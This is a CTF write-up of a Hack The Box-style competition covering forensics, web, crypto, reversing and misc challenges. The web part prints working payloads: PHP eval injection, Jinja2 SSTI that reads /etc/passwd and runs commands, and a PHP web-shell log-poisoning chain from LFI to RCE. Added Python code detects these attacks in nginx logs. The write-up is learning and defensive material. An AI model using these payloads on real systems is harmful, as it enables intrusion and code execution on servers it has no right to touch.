Challenges solved
Forensics
Sneaky, Top Secret, Endurance Ran, Phishin Impossible
Web
Sim Play, Potent Quotes, Bone Chewer Con, IMF Landing
Crypto
Weak RSA
Reversing
Check
Misc
Blobber
Forensics
Sneaky
This challenge is easy and simple, so let's go straight to the challenge description.
After unzipping the file we get a pcap.
Analyzing the pcap we can see that there is TCP and HTTP traffic, so the next thing to do is right click > Follow > TCP Stream.
Going to TCP stream 1 we can see login info with password=not_an_easy_password_to_guess.
The challenge description says that the flag is HTB{password}, so we submit HTB{not_an_easy_password_to_guess} as our flag.
Top Secret
This one gives us a pcap file only, and upon analyzing it
we see FTP, so again we follow the TCP stream.
Upon checking we find a successful login, and we can also see that the user retrieves a PDF.
Moving on to TCP stream 5 we can see PDF-1.5, which I believe is the raw data of the PDF file.
Since the stream is displayed in ASCII format, we need to show the data as raw, because saving the file from the ASCII view does not give us the flag.
This is the PDF file, and there is no flag inside; the flag format says it needs to be HTB{md5sum of the file}.
So we run md5sum on the PDF and get our flag: HTB{6ff7fa6c9aeee44c1aca5db8cf6278cb}
Endurance Ran
Downloading the file we see that it gives us an NTUSER.DAT file, which is part of the registry hive on Windows, so I googled which tools we can use.
I found the reglookup tool for analyzing a .DAT file.
Running it on our target shows a bunch of stuff, so we narrow it down.
We can use grep to find specific things; I grepped for HTB, which is part of our flag, and we got our flag, but it is still incomplete.
Analyzing it, it looks a little obfuscated, so we need to clean it up.
After cleaning it up we get this much better-looking output.
The next thing to do is put all the puzzle pieces together, and we can see that it uses powershell -c.
Since we have filtered out everything that is not part of the flag, we can put the remaining parts into the flag format.
Phishin Impossible
This time we get a PDF file.
Running strings on it gives us an idea that it contains some JavaScript and a file that we can extract.
I tried binwalk but it does not give us the file, so we use pdfextract to get the files.
We get an attached_secret, 2 stream dumps and 1 JS script.
Checking streams 5 and 8 gives us a flag-looking thing; it is the same as the attached_secret, and it does give us the flag.
The next thing to do is copy from <DeepLink> up to </deeplink>.
Putting the puzzle pieces together we get our flag.
Web
Sim Play
Checking the file we were given, we see this.
Checking the website, it only gives us the time, so the next thing to do is check the source code.
After analyzing the other files I found this one interesting; it looks like an eval() that can be exploited.
Googling about eval exploits we found this:
https://infosecwriteups.com/when-i-found-php-code-injection-87e8e30afe59
Trying to inject a command the way the article does, we can see that it does do something with the output.
Playing around a bit with different command injection payloads, an echo payload gave us a 500 internal error.
After trying some things I found the ${IFS} payload interesting, since it is a special shell variable used to split words after expansion; we could try to inject things after it such as ${IFS}ls and so on, but this did not give us anything.
https://bash.cyberciti.biz/guide/$IFS
After a while of trying it looks like we cannot use ${IFS}, so googling around we found these articles about ${} and $():
https://superuser.com/questions/935374/difference-between-and-in-a-shell-script
https://linuxhint.com/use_expansions_shell_script/
Trying things out, we can see that it does not execute our payload inside $(), but inside ${} we get a blank output, so we can probably still use this.
So the next payload I tried is ${system('ls')}, and this gave us command execution.
Going back one directory we found the flag file, and the next thing to do is read it.
Potent Quotes
The file they gave contains some databases, so we can go directly to the website; since the description says it is a login panel, we might need to do an SQL login bypass.
Doing a simple SQL injection login bypass we got inside and got our flag.
Bone Chewer Con
This challenge does not have any downloadable file, so we go directly to the website.
Upon registering it gives us this.
Trying things out, we found that there is XSS; I learned from previous CTFs that if there is XSS, either you do server-side XSS to read internal files or you do SSTI.
First I tried Jinja2 SSTI and got a successful payload: {{7*7}} = 49
Going to PayloadsAllTheThings we can try its payloads.
I used this payload to read internal files, and it worked:
{{get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read()}}
The next thing is reading the flag.
SSTI Command Execution
Since I still had some free time I tried SSTI command execution; I found this payload and tried it:
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
We can see that the payload works and that we are the root user.
Since we have command execution we can ls and then cat the flag:
{{+self._TemplateReference__context.namespace.__init__.__globals__.os.popen('cat+flag').read()+}}
IMF Landing
This challenge does not have a downloadable file, so we go to the website.
It reads the files agents.php and home.php automatically; when I see something like this I think of LFI.
So we have an LFI, but after a while of trying to read the flag it does not give us anything, so we can go from LFI to RCE.
Going to PayloadsAllTheThings gives us the idea of log poisoning to get RCE through the LFI.
We also identified that the webserver is nginx.
So we try to read /var/log/nginx/access.log, and we get a response.
After googling about log poisoning for a while we found this article.
For this exploit to work we first need to inject this payload
<?php passthru($_GET['cmd']); ?>
so that we get command execution.
The next thing to do is read /var/log/nginx/access.log and add the cmd parameter to get command execution, so our payload looks like this: /var/log/nginx/access.log&cmd=id. At first I thought it did not work, but looking closely at the response we can see at the bottom that we got www as our user.
Since the log poisoning was successful we can execute commands and get our flag.
As we can see, the reason we could not read the flag is that it has a different file name.
The next thing to do is read the flag and submit it; you can see the flag at the bottom.
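From the defender's side, both the Bone Chewer Con SSTI probes and the IMF Landing log poisoning leave fingerprints in the nginx access log: a PHP tag in a request header, the log path itself appearing in a query string, and {{ }} expressions in parameters. The following is an added example (not from the writeup or the challenge) that scans constructed nginx "combined" log lines for those three indicators; the log lines, rule names and IPs are all made up for the demo.

```python
import re
from urllib.parse import unquote

# Constructed nginx "combined" log lines for this demo; not taken from the challenge box.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?page=home.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php passthru($_GET['cmd']); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?page=/var/log/nginx/access.log&cmd=id HTTP/1.1" 200 9001 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 200 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?name=%7B%7Bself._TemplateReference__context%7D%7D HTTP/1.1" 200 200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# (rule name, fields to inspect, pattern applied to the URL-decoded field value)
RULES = [
    ("php_tag_in_header", ("ua", "referer"), re.compile(r"<\?(php|=)", re.I)),
    ("lfi_log_read", ("path",), re.compile(r"\.\./|/var/log/|/proc/self/", re.I)),
    ("ssti_probe", ("path",), re.compile(r"\{\{.*(\d+\s*[*+]\s*\d+|__globals__|__context|__init__|popen\().*\}\}")),
]

def scan_access_log(text):
    """One finding per (line, rule) hit: {'ip', 'rule', 'field', 'evidence'}, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count and alert on these too
        for name, fields, pat in RULES:
            for field in fields:
                value = unquote(m.group(field))
                if pat.search(value):
                    findings.append({"ip": m.group("ip"), "rule": name, "field": field, "evidence": value})
    return findings

def chained_ips(text):
    """IPs that tripped two or more distinct rules, e.g. poisoning the log and then including it."""
    hits = {}
    for fnd in scan_access_log(text):
        hits.setdefault(fnd["ip"], set()).add(fnd["rule"])
    return sorted(ip for ip, rules in hits.items() if len(rules) >= 2)

if __name__ == "__main__":
    for fnd in scan_access_log(SAMPLE_LOG):
        print(fnd["ip"], fnd["rule"], fnd["field"], fnd["evidence"])
    print("chained:", chained_ips(SAMPLE_LOG))
```

Matching on the URL-decoded value matters: the {{7*7}} probe arrives as %7B%7B7*7%7D%7D and a pattern applied to the raw line would miss it.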
Crypto
Crypto, and it is RSA; it gives us 2 files, flag.enc and pubkey.pem.
Of course, since it is RSA the first thing that comes to mind is RsaCtfTool; honestly I can only do crypto if I can use RsaCtfTool :D
Running the tool gives us our flag; we just need ./RsaCtfTool.py --publickey <public key> --uncipherfile <file to decrypt>
Reversing
Check
When it comes to reversing I only use radare2 and Ghidra; unfortunately I was unable to solve the other reversing challenges.
Going back, we can see that it has a main function; in radare2 we can use afl to list all of the functions.
Looking closely we can see that the flag is in plain sight:
HTB{ch3ck_anD_r3checK_ag1n}
Misc
Blobber
We get one file and it is JS; this challenge is all about deobfuscating.
The flag is a string built from char codes.
We can go to https://www.w3schools.com/jsref/jsref_fromcharcode.asp and put in all of the values to deobfuscate it.
After running it we find out that the result is base64, so we go to CyberChef and decode it.
We can see that it contains PDF-1.6, much like the forensics challenge, so what we need to do is save the output as a PDF.
There are 2 ways to read it: either we use pdftotext on the file, or we just open it to get the flag.
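The Blobber chain (fromCharCode layer, then base64, then a PDF) and the Top Secret flag format (HTB{md5sum of the file}) can be scripted instead of going through a browser and CyberChef by hand. The following is an added example, not code from the writeup; the obfuscated script it parses is constructed inline from a tiny fake PDF, so no challenge data is embedded, and the function names are my own.

```python
import base64
import binascii
import hashlib
import re

# Constructed stand-in for the challenge's obfuscated script: the numbers are the char codes
# of a base64 string that decodes to a tiny fake PDF. No real challenge data is embedded.
FAKE_PDF = b"%PDF-1.6\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"
OBFUSCATED_JS = (
    "var blob = String.fromCharCode("
    + ", ".join(str(ord(c)) for c in base64.b64encode(FAKE_PDF).decode())
    + ");"
)

CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([^)]*)\)")
NUM_RE = re.compile(r"0x[0-9a-fA-F]+|\d+")

def extract_fromcharcode(js: str) -> str:
    """Join the arguments of every String.fromCharCode(...) call (decimal or 0x hex) into one string."""
    chunks = []
    for args in CHARCODE_RE.findall(js):
        chunks.append("".join(chr(int(tok, 0)) for tok in NUM_RE.findall(args)))
    return "".join(chunks)

def sniff(data: bytes) -> str:
    """Magic-byte check for the file types that turned up in this CTF."""
    if data.startswith(b"%PDF-"):
        return "pdf"
    if data.startswith(b"PK\x03\x04"):
        return "zip"
    return "unknown"

def recover_embedded_file(js: str) -> bytes:
    """Peel the fromCharCode layer, then the base64 layer; fail loudly if a layer is not what we expect."""
    text = extract_fromcharcode(js)
    if not text:
        raise ValueError("no String.fromCharCode call found")
    try:
        return base64.b64decode(text, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"fromCharCode output is not base64: {exc}") from exc

def file_flag(data: bytes) -> str:
    """HTB{md5sum of the file} flag format from the Top Secret challenge, applied to a recovered file."""
    return "HTB{" + hashlib.md5(data).hexdigest() + "}"

if __name__ == "__main__":
    pdf = recover_embedded_file(OBFUSCATED_JS)
    print(sniff(pdf), len(pdf), "bytes", file_flag(pdf))
```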
At the end of the competition I managed to get 91st place with 11/25 solves; I think this is good progress for where I am right now.